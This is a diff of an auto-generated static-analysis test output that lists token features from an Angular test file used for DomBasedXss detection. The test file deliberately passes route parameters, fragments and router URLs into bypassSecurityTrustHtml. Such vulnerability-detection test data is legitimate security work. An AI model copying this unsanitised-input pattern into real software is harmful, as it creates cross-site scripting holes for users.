sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:74 | this.ro ... yParams | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:74 | this.ro ... yParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:74 | this.ro ... yParams | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:74 | this.ro ... yParams | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:74 | this.ro ... yParams | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:78 | this.ro ... ams.foo | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:78 | this.ro ... ams.foo | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:78 | this.ro ... ams.foo | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11963,6 +90886,76 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:78 | this.ro ... ams.foo | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:78 | this.ro ... ams.foo | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:25:44:25:78 | this.ro ... ams.foo | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:49:25:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:49:25:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:49:25:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:49:25:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:49:25:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:55:25:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:55:25:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:55:25:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:55:25:62 | snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:55:25:62 | snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:64:25:74 | queryParams | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:64:25:74 | queryParams | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:64:25:74 | queryParams | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:64:25:74 | queryParams | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:64:25:74 | queryParams | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:76:25:78 | foo | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:76:25:78 | foo | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:76:25:78 | foo | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:76:25:78 | foo | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:25:76:25:78 | foo | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:8 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:8 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:8 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:8 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:8 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:18 | this.sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:18 | this.sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:18 | this.sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:18 | this.sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:18 | this.sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:42 | this.sa ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:42 | this.sa ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:42 | this.sa ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:42 | this.sa ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:42 | this.sa ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | exceptional return of this.sa ... agment) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | exceptional return of this.sa ... agment) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | exceptional return of this.sa ... agment) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | exceptional return of this.sa ... agment) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | exceptional return of this.sa ... agment) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | this.sa ... agment) | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | this.sa ... agment) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | this.sa ... agment) | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | this.sa ... agment) | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:5:26:72 | this.sa ... agment) | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:10:26:18 | sanitizer | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:10:26:18 | sanitizer | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:10:26:18 | sanitizer | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:10:26:18 | sanitizer | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:10:26:18 | sanitizer | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:20:26:42 | bypassS ... ustHtml | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:20:26:42 | bypassS ... ustHtml | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:20:26:42 | bypassS ... ustHtml | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:20:26:42 | bypassS ... ustHtml | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:20:26:42 | bypassS ... ustHtml | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:47 | this | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:47 | this | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:47 | this | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:47 | this | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:47 | this | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:53 | this.route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:53 | this.route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:53 | this.route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:53 | this.route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:53 | this.route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:62 | this.route.snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:62 | this.route.snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:62 | this.route.snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:62 | this.route.snapshot | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:62 | this.route.snapshot | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | | autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:71 | this.ro ... ragment | CalleeFlexibleAccessPath | this.sanitizer.bypassSecurityTrustHtml | | autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:71 | this.ro ... ragment | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:71 | this.ro ... ragment | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | @@ -11970,6 +90963,86 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:71 | this.ro ... ragment | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | | autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:71 | this.ro ... ragment | enclosingFunctionName | ngOnInit | | autogenerated/Xss/DomBasedXss/angular2-client.ts:26:44:26:71 | this.ro ... ragment | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:49:26:53 | route | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:49:26:53 | route | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:49:26:53 | route | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:49:26:53 | route | enclosingFunctionName | ngOnInit | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:49:26:53 | route | fileImports | @angular/common @angular/core @angular/platform-browser @angular/router | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:55:26:62 | snapshot | contextFunctionInterfaces | constructor(route, sanitizer, router, sanitizer2)\nngOnInit()\nsomeMethod(routeSnapshot) | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:55:26:62 | snapshot | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:55:26:62 | snapshot | enclosingFunctionBody | sanitizer bypassSecurityTrustHtml \u0275getDOM getLocation href sanitizer bypassSecurityTrustHtml route snapshot params foo sanitizer bypassSecurityTrustHtml route snapshot queryParams foo sanitizer bypassSecurityTrustHtml route snapshot fragment sanitizer bypassSecurityTrustHtml route snapshot paramMap get foo sanitizer bypassSecurityTrustHtml route snapshot queryParamMap get foo route paramMap subscribe map sanitizer bypassSecurityTrustHtml map get foo sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 path sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameters x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap get x sanitizer bypassSecurityTrustHtml 1 route snapshot url 1 parameterMap params x sanitizer bypassSecurityTrustHtml router url sanitizer2 bypassSecurityTrustHtml router url | +| autogenerated/Xss/DomBasedXss/angular2-client.ts:26:55:26:62 | snapshot 